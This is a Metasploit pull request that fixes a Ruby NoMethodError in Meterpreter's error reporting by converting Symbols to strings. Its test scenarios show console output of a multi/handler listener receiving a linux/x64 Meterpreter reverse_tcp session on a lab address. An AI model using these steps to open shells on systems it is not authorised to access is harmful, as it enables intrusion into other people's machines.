### PR TITLE
Fix RequestError class undefined method issue

### DIFF
--- a/lib/rex/post/meterpreter/packet_dispatcher.rb
+++ b/lib/rex/post/meterpreter/packet_dispatcher.rb
@@ -23,7 +23,7 @@ class RequestError < ArgumentError
     end
 
     if mod
-      command_name = mod.constants.select { |c| c.start_with?('COMMAND_ID_') }.find { |c| command_id == mod.const_get(c) }
+      command_name = mod.constants.select { |c| c.to_s.start_with?('COMMAND_ID_') }.find { |c| command_id == mod.const_get(c) }
       command_name = command_name.to_s.delete_prefix('COMMAND_ID_').downcase if command_name
     end
 


### PR DESCRIPTION
If Metasploit receives an error response from Mettle, Metasploit attempts to return which command failed. The search for the command id currently throws a `NoMethodError` because `start_with?` is called on a `Symbol` instead of a `String`. This change just makes sure the variable used is a string before `start_with?` is called on it.

## Verification

- [ ] Start `msfconsole`
- [ ] Generate a Meterpreter payload
- [ ] Get a Meterpreter session
- [ ] Use a command that you expect to fail: `rm blah.notrealext`
- [ ] **Verify** that the error tells you which extension / command was used

## Scenarios

### Before fix

```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload linux/x64/meterpreter/reverse_tcp
payload => linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (3008420 bytes) to 192.168.37.170
[*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.170:35530) at 2021-03-12 17:56:58 -0600

meterpreter > rm blah.c
[-] Error running command rm: NoMethodError undefined method `start_with?' for :TLV_TYPE_LOCAL_DATETIME:Symbol
```

### After fix

```
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (3008420 bytes) to 192.168.37.170
[*] Meterpreter session 2 opened (192.168.37.1:4444 -> 192.168.37.170:35532) at 2021-03-12 17:59:07 -0600

meterpreter > rm blah.c
[-] stdapi_fs_delete_file: Operation failed: 1
```
